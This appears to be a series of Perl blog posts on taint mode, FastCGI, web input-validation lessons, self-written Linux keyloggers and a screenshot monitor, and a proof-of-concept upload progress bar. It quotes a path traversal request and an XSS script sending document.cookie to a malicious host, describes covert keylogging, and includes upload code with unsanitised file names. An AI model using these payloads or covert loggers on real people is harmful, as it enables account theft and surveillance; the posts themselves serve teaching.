Fortunately it wasn't too difficult to fix my code for taint mode to work. I was already centralizing my various string filtering functions to a small handful, which just needed to untaint the strings before returning them.
Then it was just a matter of making sure I ran these filters everywhere that a user ID gets passed into a function (I was relying on the fact that my userExists()
check would fail if you give a bad user ID number, but the variable was technically still tainted so I had to fix that properly).
I've thoroughly tested all areas of my sites to make sure nothing broke. Hopefully I didn't miss any. :)
With mod_perl, the Apache server would run its own built-in Perl interpreter which would be re-used between requests, so that the overhead of having to load the Perl interpreter for every request goes away.
I tested it on my dev server first, and got it all set up and then realized it doesn't work with mod_suexec. With mod_suexec, you can have multiple users on the web server who each have their own websites, and their Perl/CGI scripts will execute in the name of the user instead of as the global Apache user. So then, it makes permission handling easier: the Perl script can read and write files owned by the same user who owns the entire website. But, with mod_perl, the Apache user executes the Perl scripts and this causes problems.
So I found an alternative: FastCGI. It's black magic to me, but it works similarly to mod_perl (reusing the same Perl process for multiple requests), but it does work with mod_suexec. So, I've gotten Kirsle.net and Siikir.com to both use FastCGI now, and, well, both sites run a lot faster. :)
Every request still creates its own unique instance of the Siikir CMS object, but I did tweak my JsonDB plugin a bit for performance too: while every request has its own CMS object, the JsonDB plugin is always a singleton object--it is only initialized once, and then it is shared between every request. Also, it caches the DB documents when it reads them and keeps the cache in memory until the document changes on disk. So this helps tremendously with the file I/O problem on my server. Running the search page on Siikir.com gives results in less than 3 seconds, whereas before it would easily take 10 to 15 seconds.
I'm still keeping a lookout for new bugs that may emerge, though. I have to test and make sure the JSON document caching is working properly, for example. But for now everything seems to be working out pretty well. :)
Here are some of my anecdotes from the times when I've personally been bit by this, so that hopefully you won't repeat my mistakes and will be more aware of just how many ways users can try to get past your site's defenses.
My anecdote: I once wrote a super simple guestbook in Perl. It had three form fields: a name and an e-mail which were both single-line text boxes, and a textarea which took multiple lines of text. Guestbook entries were stored in a flat text file, with one line per entry, so it looked like this:
Dave|dave@example.com|Hey, nice site! Mike|mike@example.net|Hey, just leaving a guestbook entry!Obviously, I stripped all HTML code out from all the form fields, in order to protect myself against an XSS attack. But, I figured, the "name" and "email" are text boxes that can't have multiple lines, and so I only filtered multiple lines from the "message" (I substituted them with a "<br>" instead, after removing other HTML, so they would display with multiple lines on the "view guestbook" page).
How I got bit: One of those Dumb Submitter Bots found my guestbook and spammed every field on the page with their multiple-line junk mail including hundreds of links to sites that are sure to infect you with a virus.
So, my guestbook.txt started to look like this:
Dave|dave@example.com|Hey, nice site! Mike|mike@example.net|Hey, just leaving a guestbook entry! Rolex watches 80% off! [url=spam site 1]click here![/url] [url=spam site 2]click here![/url]|spammer@spammy.ru|Rolex watches 80% off!<br><br>[url=spam site 1]click here![/url]...The result wasn't too bad though: just a few guestbook entries displayed on the page that shouldn't and made the page look broken.
Lessons learned: Never, NEVER trust your form inputs. Literally ANY type of data can be sent under ANY of your fields. To make it clear, even your <select> boxes aren't safe. You may think you limit your user to sending only one of a few options when they submit the form, but they can still easily submit anything else in that field.
/index.cgi?p=aboutMy site was coded to take this parameter and open a text file named "about.txt" to get the content of the page the user wanted, something along the lines of:
my $page = "./private/pages/" . $q->param("p") . ".txt";One of my friends kindly broke this for me and told me what he did. What he did was linked to a page with a URI that looked more along the lines of this:
/index.cgi?p=../users/adminAnd so the file my site was opening was "./private/pages/../users/admin.txt", or, more canonically, "./private/users/admin.txt"; and so, he was able to download the private user information for my admin user, including the password (I don't think I even hashed my passwords back then, either). Bad!
Any user-supplied data that is going to be used to access the server filesystem should be thoroughly filtered. Nowadays I would use a regular expression like this:
$p =~ s/[^A-Za-z0-9\.\-]//g;Stripping out everything that isn't a number, letter, period or dash.
This is an unexpected vector of attack. User-Agents and Referers are just as easy for a malicious user to edit to anything they want as a form field. So, once I was viewing my User-Agent page and I got a JavaScript error in my browser. Investigating, there was a bit of broken JavaScript code on my page, inside my list of User-Agents!
It was along the lines of this:
<script>window.location = "http://something-malicious.ru/cookie.php?cookie= + document.cookie;</script>The
A great many web applications rely on the environment variable REMOTE_ADDR, which contains the remote user's IP address. Web apps log your IP along with the things you post on the site, so that if they need to ban you for spamming, they're able to ban you by your IP address.
But this breaks when you get proxy servers involved, because a proxy server requests your web app on behalf of numerous users on the other side, and if you ban the proxy server's IP address, you ban a lot of innocent users. So, a lot of proxy servers will send an "X-Forwarded-For" header to your server which contains the IP address of the user behind the proxy.
So, a lot of poorly coded web apps will prefer X-Forwarded-For instead of the REMOTE_ADDR, for example by using code like this:
my $ip = $ENV{HTTP_X_FORWARDED_FOR} || $ENV{REMOTE_ADDR};But, X-Forwarded-For should be considered user-supplied information. A malicious user can set this header to anything they want, which means they can try embedding HTML code in it (so when your web forum shows the IP address to your admins, the HTML code executes instead), or they may merely fake their IP address with it (like setting it to the localhost address, 127.0.0.1).
Anyway, I hope after reading this you'll keep in mind that the phrase "never trust your user" extends even to some pretty unusual places.
Well, that keylogger had its problems. Although it had a couple of pros in there too compared to my new keylogger. The problem it had was that it required you to have root privileges on the Linux system you run it on, because it needed to read from /dev/input/*
devices directly, which only the root user has permission to do. It also needed you to figure out which device node to read from ahead of time. And finally, it didn't work on some types of keyboards (I only tested it with a USB keyboard but I've heard reports from others that it just doesn't work for them).
The only pro it had was that it would log keys at the hardware level, including on text mode terminals.
And so, the new keylogger does not require root privileges! The new keylogger relies on the X Window System, though, but this is the de facto windowing system on just about every Linux/Unix system out there today. This also means it will only log keys entered into graphical applications (for desktop *nix users though, this would log keys for just about everybody) so users in a text-mode terminal won't be logged.
One issue I ran into though is that the xinput test
command seems to expect you to have a terminal (or TTY), i.e. that you run the command from a graphical terminal. So trying to read the output of this command in Perl caused some weird buffering issue, where the command wouldn't give any output until about 100 characters were typed. So, the script requires the IO::Pty::Easy
module which creates a virtual TTY so that xinput
believes you're running it from a real shell.
The new keylogger's source code can be found here. Have fun! :)
When run from a graphical terminal, the $DISPLAY environment variable is already set to your current X display, e.g. ":0.0". But when launched from a non-graphical environment, the script would need to set the value of $DISPLAY itself, in order for xinput
to know which X server to connect to.
Well, maybe if the keylogger changes up the value of $DISPLAY to log from different X servers it may be able to cross the partitions set up by Qubes. I'll have to investigate this further. (6)
Today I learned the hard way that file handle names in Perl can conflict with package names of Perl modules.
I was adding emoticon support to my Siikir CMS ( :-) ), and so I had downloaded this open source Tango emoticon set that came with an emoticons.txt
file that described what trigger texts correspond to each PNG image. So, I wanted to write a quick Perl script that would use the JSON module and convert this plain text emoticon list into a JSON file that the Siikir CMS could use.
For some slight backstory, Siikir uses JSON all over the place. The entire database system is using JSON, and so Siikir has a "JsonDB" plugin that manages all database access. It looks like this:
my $db = $self->Master->JsonDB->getDocument("users/by-name/kirsle");
Anyway, the JsonDB plugin creates a JSON object as follows:
$self->{json} = JSON->new->utf8->pretty();
This has always worked fine. But for some odd reason, my little Perl script that converted my emoticons to JSON for me was throwing this bizarre error message from the same constructor:
Can't locate object method "new" via package "IO::File" at mkjson.pl line 4.
This made no sense to me. What, was IO::File failing to load? So I add an explicit "use IO::File;
" in my code (ordinarily, if JSON requires this module, it should've auto-loaded when I did "use JSON;
", but something was wrong here). This turns the error message into this:
Can't locate object method "utf8" via package "GLOB" at mkjson.pl line 4.
WTF. I try to debug this weird error message in all the usual ways (like using Data::Dumper
to dump the contents of %INC, and verify that the JSON.pm being loaded is the same one the Siikir CMS uses; it was). After running out of ideas, I scrapped using JSON.pm in this script and just hard-coded it to write JSON code to the output file directly.
Then it was time to create the Emoticons plugin for Siikir, which would be a centralized piece of code to render emoticons for every page that wants them. I couldn't use the JsonDB to manage the emoticons now, because each emoticon "theme" is supposed to keep its own "emoticons.json" file within itself, instead of putting them in my global database directory. So, Emoticons.pm needed to use its own JSON object.
I was bizarrely running into the same dumb error messages in my Emoticons plugin too. I thought for a minute that maybe
, the environment of my bash terminal running my small script was different than the Apache server's environment, because my JsonDB plugin never threw these sorts of errors. But now my Emoticons plugin was throwing errors just like my small script was!
Well, here would be the full source of my small script (I added in the exit 1
right after the JSON constructor line just to test the JSON line without the chance of running the entire script again should the error miraculously disappear):
#!/usr/bin/perl -w
use strict;
use warnings;
use JSON;
use Data::Dumper;
#die Dumper(\%INC);
my $json = JSON->new->utf8->pretty();
exit 1;
open (EMO, "emoticons.txt");
open (JSON, ">emoticons.json");
print JSON "{\n"
. "\tname: 'Tango',\n"
. "\tsource: 'http://digsbies.org/site/content/project/tango-emoticons-big-pack',\n"
. "\tmap: {\n";
while (my $line = <EMO>) {
chomp $line;
$line =~ s/[\x0D\x0A]+//g;
next unless length $line;
my ($img,@codes) = split(/\s+/, $line);
my @escaped;
foreach my $c (@codes) {
$c =~ s/\'/\\'/g;
push (@escaped, $c);
}
my $escaped = join(", ", map { qq{'$_'} } @escaped);
print JSON "\t\t\"$img\": [ $escaped ],\n";
}
print JSON "\t}\n}";
close (JSON);
close (EMO);
See the problem? Apparently, because I had named my output filehandle "JSON", this was conflicting with the package named JSON. If I cut out all of the code after the "exit 1", the error went away and the code would compile and run just fine. The same problem occurred in my Emoticons plugin because I was using "JSON" as the filehandle name when reading the JSON text from disk. Changing the name for the filehandle fixed my problem.
My JsonDB module used the names READ and WRITE for its filehandles, which is why this problem didn't occur there.
So, apparently, filehandles must share the same namespace as packages. The annoying thing is that the errors given are completely misleading. :(
Sometimes, Perl code I work with exhibits signs of "quantum" behavior. By this I mean, in quantum physics, an electron behaves as both a wave and a particle, unless you actually look closely at it to see which one it chooses to behave as. In which case it behaves as a particle, which makes sense to everybody because an electron is a particle. See "Double Slit Experiment" for more on that.
At various different times in my software development career, a bug would pop up in the Perl code. Something is broken, the program gives wrong results or it crashes due to an error. Let's say the error is something that looks like,
Can't coerce array into hash at script.pl line 1337.
The obvious culprit here is that at line 1337, the variable it's trying to treat as an associative array (a hash) is instead a regular array. So first thing I would do here is find this line, and then add some "print" lines of code to see what type of data is in that variable. Aha, it's an array, now I have to trace it back in the code to find out at what point this data became an array.
Usually a problem like this occurs due to an oversight by one of the other developers. A developer trying to fix one bug might have assigned an array to this variable because it was convenient to solve their problem, and they didn't know at the time that the change has broken this code I'm working with now. So I go on debugging, adding print statements here and there to check what's inside every variable.
Once the problem is thoroughly diagnosed and I can see what's in every variable along the way, the bug just mysteriously vanishes. Every variable contains the data I would expect them to, the bug stops happening, and the only thing I changed in the code was just the simple adding of debug code. My code didn't modify the program in any tangible way, and yet the bug is gone.
So I have a WTF reaction, and remove all my debugging code. The bug is still "fixed." I check the svn diff
to see the differences between my copy of the code and the last copy I checked out from Subversion. Nothing that would make a difference. I svn revert
, turning my copy back to the original one, before I touched it at all. The bug is still gone!
So I blame the quantum perl fairy and call the bug resolved and it doesn't come back up again. Weird.
TL;DR - the QA people see a bug on their computers, file a bug report, the developer (me) sees the report, tests the bug to make sure it's there, begins debugging it only enough to diagnose the problem well enough that the next step would be to fix it, and the bug just fixes itself. The process of looking at the bug made the bug fix itself like some sort of black magic.
I love Perl as a programming language. It's easy, fast enough for almost any application, and is often called the "swiss army chainsaw" of programming languages because it makes easy tasks easy and hard tasks possible. But, it doesn't excel very well in a couple of areas which I'll outline below, due to the state of neglect of some of its modules and ports.
use Tk;This module is probably one of the most neglected modules on CPAN. It was a direct port from the Tcl/Tk that was current at the time that Perl/Tk was written. The result is that, when you run a Perl/Tk program on any platform other than Windows, it resembles an excruciatingly ugly Motif style application (see my screenshots of my Perl CyanChat Client for examples). Under Windows, though, a Perl/Tk app more or less fits in.
Because Perl/Tk was a direct port of a very old version of Tk, updating it to keep it modern has been a difficult task and so naturally nobody has done it. The only love Perl/Tk gets these days is maintenance work just to be sure it can still be compiled for modern versions of Perl.
So what can we do about this?
There are a couple other Tk implementations for Perl: Tkx by ActiveState and Tcl::Tk. These two modules are modern Tk implementations for Perl, and so they look very nice on every platform. But how usable are they?
Tkx is ActiveState's creation, and I've only been able to get it to work when using ActivePerl. This is fine for Windows, where ActivePerl is arguably the most popular Perl interpreter for Windows. But when I tried compiling Tkx for a stock Perl that ships with Fedora Linux, it gives segmentation faults and crashes. It's not usable under Linux with a stock version of Perl.
There's an ActivePerl for Linux, though, but the problem is that this Perl installation would be independent from the stock Perl that comes with your operating system. So if I needed to install another third party module to use with a ActivePerl/Tkx application, I wouldn't be able to run a simple "yum install perl-{module}" command to get it. I'd have to use ActivePerl's ppm tool, if it even had the module I want. Otherwise I need to compile the module myself for ActivePerl. Yuck. This isn't "the Linux way" of doing things. The package manager should be aware of everything that you install on your system.
ActivePerl/Tkx is out of the question for Linux then. What about Tcl::Tk? I've attempted to compile and use Tcl::Tk on a few different versions of Fedora Linux and every time they give me segmentation faults just like Tkx did. No good.
So Tk is one thing that Perl can't do very well due to lots of neglect. In contrast, the Tk ports for Python, Ruby and Tcl (of course) are much better maintained.
I know there are ports to GTK+, Wx and Qt for Perl as well, if you want to create a GUI. In my experience: Wx has a completely broken HTML widget in Perl and parts of the demo crash, GTK+ is neglected too, and I never got Qt to compile.
The Perl SDL module is very "feature incomplete." The only notable thing anybody has made with Perl SDL was Frozen Bubble, and the developers of that had to hack up their code a lot to get around the limitations of the SDL module.
Perl for games? Sure, if you want to blow the dust off the SDL module and are ready to do a ton more hacking than you wanted to just to get it to work.
Most other languages have modern SDL ports. Pygame comes to mind as I mentioned before, which has a fairly active community of users actually creating games in Python.
Perl's GD module though is in a pretty bad state of neglect. All it's good for in Perl is scaling images down (and even then it doesn't do very well; look at my photo album on kirsle.net; it can't seem to save a jpeg image with any good amount of quality. Every time it saves an image it comes out extremely grainy and it completely ignores any settings to make it not do this).
Generating an image from scratch? Maybe you can get it to work with enough effort, but good luck getting text to show up in any color besides black. Using a "template image" to generate a dynamic image off of? Good luck coming up with new colors to use that aren't in the template image. It's just a giant mess.
Image::Magick or Imager are better alternatives, at least. I started using Image::Magick on all my new web development projects, and the next iteration of kirsle.net's code will be using that to handle images instead of GD.
It's also good, of course, for regular expressions and number crunching, which is what it was targeted towards in the first place.
It's not particularly strong at anything else though. Creating a graphical application? Good luck. Creating a game? Don't think about it. Use Python instead.
There are a ton of other modules on CPAN collecting dust that don't work anymore, or don't work particularly well. Net::YMSG for interacting with Yahoo Messenger? Completely broken. Net::AIM for AOL Instant Messenger? Not working (but Net::OSCAR still works as far as I last checked). Audio::Audiere? I don't know anybody who's managed to compile it.
Part of me hopes Perl 6 will be usable soon and I can start learning that (contrary to popular belief, Perl 6 is not the successor to Perl 5 but is a completely separate language), and that any new modules for Perl 6 will be modern (using modern Tk and SDL for example) and will be maintained well in the future, as the ports for Python and other languages are. But part of me just thinks I should put a lot more effort into making Python my new favorite language and using Perl only for the few tasks that Perl does well (like for shell scripting).
Why? To see if anybody else uses my computer when I'm not there, and to see what they were doing with it.
Basically, you run this script as root, and it monitors your major hardware input devices for any activity. By default it watches /dev/console
(which, on Fedora systems, seems to output data whenever there's keyboard activity), and /dev/input/mice
(which is a common node for the collective input of any and all mice attached to a computer).
When it sees any activity at all on either of these devices (it doesn't care what the devices are doing, it just cares that they're active), it begins taking screenshots. If you use the keyboard or mouse for a little bit, and then stop for 2 seconds, it takes a screenshot. If you use the keyboard or mouse constantly and don't stop, it will take a screenshot every 5 seconds.
So it essentially creates a visual log of everything you were doing on the computer; every time you type, stop typing, type like crazy, move the mouse, stop moving the mouse... anything that happens, a screenshot is taken.
It uses scrot
to take the screenshot, since this is the lightest-weight screen capturing program I could find. Using ImageMagick's import
command is slow, and makes the computer beep, and GNOME's screensaver application can't run without showing a GUI window.
You can check it out here. You'll be required to edit the script in the "configuration" section though, at least to change the directory where it saves the screenshots to.
Since the script runs as root, the images it creates are naturally owned by root as well, and can't be deleted by the nonprivileged user, even if the user does manage to find the screenshots. Better yet, you can have the screenshots saved under root's home directory, keeping them completely out-of-sight for the user. And, to kill the script, you have to be root since it will be a root-owned process. +1 if your unauthorized users don't know your root password!
/dev/input/event0
. You run it as root again, and it saves keystrokes to a file under /tmp
.Actually, it doesn't store all keystrokes; instead, it stores what the user "intended" to type. That is, if a user begins typing a sentence and makes a typo and hits backspace a few times and then continues typing, what gets logged is what they actually ended up typing... you don't see their typo; when they hit backspace, the log buffer also deleted the last character it logged, before saving it to disk.
It separates what they type based on certain "divider characters," which includes Tab, Return and Enter. So as they fill out a web form, the script would log one line of text for each field they filled out as they tab through the form. Also, if they delay their typing for a few seconds it will dump the current buffer to the log file as well, so if they're a particularly slow typer, one "sentence" may span multiple lines in the log file.
I can't recommend using this keylogger for malicious purposes, it's just being uploaded for educational purposes only and should only be used as a personal desktop monitoring solution, if it should be used at all.
Source code: keylog.
The type of game I'll be making with it will be a 2D RPG type game, with a top-down perspective (think: Zelda, SNES-era Star Ocean, etc.). I feel that this type of game offers the most flexibility, having a wide-open game world where you can move your character in two dimensions.
I'm programming it in Perl, because I know Perl better than any other language (with Java coming in second place, but I'll avoid getting Java involved if I can help it). ;) However, it's highly possible that I'll need to switch languages down the line, so I'm future-proofing what code I am writing just in case any major changes need to happen.
For example, I like the model employed by Sierra and LucasArts when they made their games based on AGI (Adventure Game Interpreter) and SCUMM (Script Creation Utility for Maniac Mansion), respectively. Their game engines were programmed in who-knows-what language (likely C), but the games themselves--the scripts for dialog and interactions within the game--used a new, home-made programming language. This way, the game engine can be reprogrammed in a different language, and the existing games can "just run" on the new engine without any modification.
This is how ScummVM is able to run old SCUMM games; they've just re-implemented the SCUMM engine, and the existing games can "just run" on ScummVM without requiring them to be modified at all.
So, my game engine will be similar, using a new scripting language, so that if I have to scrap Perl in the future and go to Java, all I need to do is re-implement the engine in Java, and what game code I have written will "just work" on the new engine.
Now, as for the Perl stuff... I'm future-proofing my code against other Perl modules, too.
The engine runs out of a core Perl module, and it uses multiple "front-end plug-ins" to actually interact with the user. They're divided into three categories: Graphics Front-end, Sound Front-end, and Filesystem Front-end.
Perl/Tk may be dated, and look ugly as hell on Unix, but if the Tk window only consists of a Canvas widget (which is what I'm planning for), you won't be able to tell. Compose a nice picture in a Canvas and it looks the same on all platforms.
Tk Canvas treats everything you draw in them as "objects", or sprites as far as my game will be concerned. It means that once you put an image in the canvas, you can move that image around later by its ID. SDL, on the other hand, is not sprite-based, but pixel-based, so to move a sprite you've already placed, you have to erase it and redraw it. Plus one for Tk.
Tk Canvas doesn't support layers, but it does support "implied layering"... that is, each object you place on the canvas gets an implicit Z-index that's one higher than the object you placed before it. This is the same as the default behavior in HTML. When you move sprites around after placing them, they'll either stay above or below other sprites, depending on the order the sprites were drawn. Therefore, by drawing sprites in the right order, layers can be simulated. SDL doesn't support layers either, so +1 for Tk here again.
At any rate, the graphics front-end won't be too integrated with the core game engine. Instead, it will register callbacks to the engine, so Tk will say "when you want me to draw a sprite, call this function of mine and I'll take care of it."
This way, the core engine just tells the graphics front-end what to do: what sprites to draw, where to move them to, etc. and the front-end just does as it's told. This way, the internals of Perl/Tk don't get caught up in the core engine; if I need to ditch Tk and use SDL instead, I just need to make SDL respond to the same commands from the core as Tk does and all is well.
Tk doesn't have any audio support of any kind. But fortunately, there are other Perl modules that can handle audio. For Windows computers, there is Win32::MediaPlayer, and for Linux there is GStreamer.
Win32::MediaPlayer and GStreamer both can play whatever codecs the user has installed. On Windows this means it can play mp3, wav, even midi music out-of-box. On Linux it means it can play wav, ogg, and other formats that aren't patented. If the Linux user installs MP3 support, though, GStreamer can play mp3 files too!
Similar to the graphics front-end, the sound front-end registers callbacks. When the core wants to play a sound effect, it calls a method in the sound front-end to do so, and the sound front-end does it.
If I stick with open audio formats, I can have an SDL audio front-end to get sound for Mac OS X too, since there isn't yet a Perl module to play sound natively on OS X.
With such an archiving algorithm, the game could store all its data files (images and scripts) into a read-only archive, which only the game knows the password to. This stops the players from getting in there and seeing sprites for characters in the game they haven't seen yet themselves, and especially to prevent them from modifying the game's script if they do manage to get into the archive.
(By the way, my game engine will probably be released as open source software, so you'll be able to make your own games with it; just stay out of my games' files!)
Until Archive::Tyd is completed though, the game will just read files off the filesystem directly. But the filesystem front-end is there so that in the future, I can replace it with one that reads files out of Tyd archives instead.
Anyway, I've already gotten a few hundred lines of code written, and the general framework for the engine is already working (abstracting away the graphics front-end from the core, for example). I've recently completed a tileset handling Perl module which I intend to use for it.
When I get more work done, and especially when there's a playable demo of the game engine, I'll probably make a small website for it as a subdomain of kirsle.net.
This is a re-do of my previous blog post about Perl upload progress bars - my previous approach was completely wrong. By the time $q->upload();
is used, the file has already been received and stored in a temporary location, and so the "progress bar" in this case is really just gauging how fast the server can copy the file from one place to another on its hard drive.
So this post is how to really do a real working file uploader progress bar in Perl.
The basic steps required to do this include:
$q->upload();
and everything like before.The source code needed for this is still amazingly short and concise, compared to the source codes you'll get when you download solutions from elsewhere.
Implementing this doesn't require any special Apache handlers or mod_perl or anything fancy like that.
Sources:
upload.html
<!DOCTYPE html>
<html>
<head>
<title>Upload Test</title>
<style type="text/css">
body {
background-color: #FFFFFF;
font-family: Verdana,Arial,sans-serif;
font-size: small;
color: #000000
}
#trough {
border: 1px solid #000000;
height: 16px;
display: block;
background-color: #DDDDDD
}
#bar {
background-color: #0000FF;
background-image: url("blue-clearlooks.png");
border-right: 1px solid #000000;
height: 16px
}
</style>
</head>
<body>
<h1>File Upload Test</h1>
<div id="progress-div" style="display: none; width: 400px; margin: auto">
<fieldset>
<legend>Upload Progress</legend>
<div id="trough">
<div id="bar" style="width: 0%"></div>
</div>
Received <span id="received">0</span>/<span id="total">0</span> (<span id="percent">0</span>%)
</fieldset>
</div>
<div id="upload-form" style="display: block; width: 600px; margin: auto">
<fieldset>
<legend>Upload a File</legend>
<form name="upload" method="post" action="upload.cgi" enctype="multipart/form-data" onSubmit="return startUpload()" id="theform">
<input type="hidden" name="do" value="upload">
<table border="0" cellspacing="0" cellpadding="2">
<tr>
<td align="left" valign="middle">
Session ID<span style="color: #FF0000">*</span>:
</td>
<td align="left" valign="middle">
<input type="text" size="40" name="sessid" id="sessid" readonly="readonly">
</td>
</tr>
<tr>
<td align="left" valign="middle">
File:
</td>
<td align="left" valign="middle">
<input type="file" name="incoming" size="40">
</td>
</tr>
</table><p>
<input type="submit" value="Upload It!"><p>
<small>
<span style="color: #FF0000">*</span> Randomly generated by JavaScript. In practice this would be
randomly generated by server-side script and "hard-coded" into the HTML you see on this page.
</small>
</fieldset>
</div>
<div id="debug"></div>
<script type="text/javascript">
// a jquery-like function, a shortcut to document.getElementById
function $(o) {
return document.getElementById(o);
}
// called on page load to make up a session ID (in real life the session ID
// would be made up via server-side script and "hard-coded" in the HTML received
// by the server, thus it wouldn't require javascript at all)
function init() {
// Make up a session ID.
var hex = [ "0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
"A", "B", "C", "D", "E", "F" ];
var ses = "";
for (var i = 0; i < 8; i++) {
var rnd = Math.floor(Math.random()*16);
ses += hex[rnd];
}
$("sessid").value = ses;
// we set the form action to send the sessid in the query string, too.
// this way it's available inside the CGI hook function in a very easy
// way. In real life this would probably be done better.
$("theform").action += "?" + ses;
}
window.onload = init;
// This function is called when submitting the form.
function startUpload() {
// Hide the form.
$("upload-form").style.display = "none";
// Show the progress div.
$("progress-div").style.display = "block";
// Begin making ajax requests.
setTimeout("ping()", 1000);
// Allow the form to continue submitting.
return true;
}
// Make an ajax request to check up on the status of the upload
function ping() {
var ajax = new XMLHttpRequest();
ajax.onreadystatechange = function () {
if (ajax.readyState == 4) {
parse(ajax.responseText);
}
};
ajax.open("GET", "upload.cgi?do=ping&sessid=" + $("sessid").value + "&rand=" + Math.floor(Math.random()*99999), true);
ajax.send(null);
}
// React to the returned value of our ping test
function parse(txt) {
$("debug").innerHTML = "received from server: " + txt;
var parts = txt.split(":");
if (parts.length == 3) {
$("received").innerHTML = parts[0];
$("total").innerHTML = parts[1];
$("percent").innerHTML = parts[2];
$("bar").style.width = parts[2] + "%";
}
// Ping again!
setTimeout("ping()", 1000);
}
</script>
</body>
</html>
upload.cgi
#!/usr/bin/perl -w
use strict;
use warnings;
use CGI;
use CGI::Carp "fatalsToBrowser";
# Make a file upload hook.
my $q = new CGI (\&hook);
# This is the file upload hook, where we can update our session
# file with the dirty details of how the upload is going.
sub hook {
my ($filename,$buffer,$bytes_read,$file) = @_;
# Get our sessid from the form submission.
my ($sessid) = $ENV{QUERY_STRING};
$sessid =~ s/[^A-F0-9]//g;
# Calculate the (rough estimation) of the file size. This isn't
# accurate because the CONTENT_LENGTH includes not only the file's
# contents, but also the length of all the other form fields as well,
# so it's bound to be at least a few bytes larger than the file size.
# This obviously doesn't work out well if you want progress bars on
# a per-file basis, if uploading many files. This proof-of-concept only
# supports a single file anyway.
my $length = $ENV{'CONTENT_LENGTH'};
my $percent = 0;
if ($length > 0) { # Don't divide by zero.
$percent = sprintf("%.1f",
(( $bytes_read / $length ) * 100)
);
}
# Write this data to the session file.
open (SES, ">$sessid.session");
print SES "$bytes_read:$length:$percent";
close (SES);
}
# Now the meat of the CGI script.
print "Content-Type: text/html\n\n";
my $action = $q->param("do") || "unknown";
if ($action eq "upload") {
# They are first submitting the file. This code doesn't really run much
# until AFTER the file is completely uploaded.
my $filename = $q->param("incoming");
my $handle = $q->upload("incoming");
my $sessid = $q->param("sessid");
$sessid =~ s/[^A-F0-9]//g;
$filename =~ s/(?:\\|\/)([^\\\/]+)$/$1/g;
# Copy the file to its final location.
open (FILE, ">./files/$filename") or die "Can't create file: $!";
my $buffer;
while (read($handle,$buffer,2048)) {
print FILE $buffer;
}
close (FILE);
# Delete the session file.
unlink("./$sessid.session");
# Done.
print "Thank you for your file. <a href=\"files/$filename\">Here it is again.</a>";
}
elsif ($action eq "ping") {
# Checking up on the status of the upload.
my $sessid = $q->param("sessid");
$sessid =~ s/[^A-F0-9]//g;
# Exists?
if (-f "./$sessid.session") {
# Read it.
open (READ, "./$sessid.session");
my $data = <READ>;
close (READ);
print $data;
}
else {
print "0:0:0:error session $sessid doesn't exist";
}
}
else {
print "0:0:0:error invalid action $action";
}
You can download my full proof-of-concept test below:
Notice: this code is called "proof of concept"; it is NOT production-ready code. You should NOT download this if all you want is a complete plug-and-play solution you can quickly upload to your web server to get file uploading to work. I wrote this code only to show how to make a file uploader in the simplest way possible; this is useful for developers who only needed to know how this is done and who will write the code themselves to develop their production-ready file uploader.
If you want to treat this as a plug-and-play solution, I'm not your tech support about it. The code was never meant to be secure or useful to allow the general public to upload files through it. Session IDs are made up client side for example which is a bad idea in real use case scenarios, etc.
0.0015s
.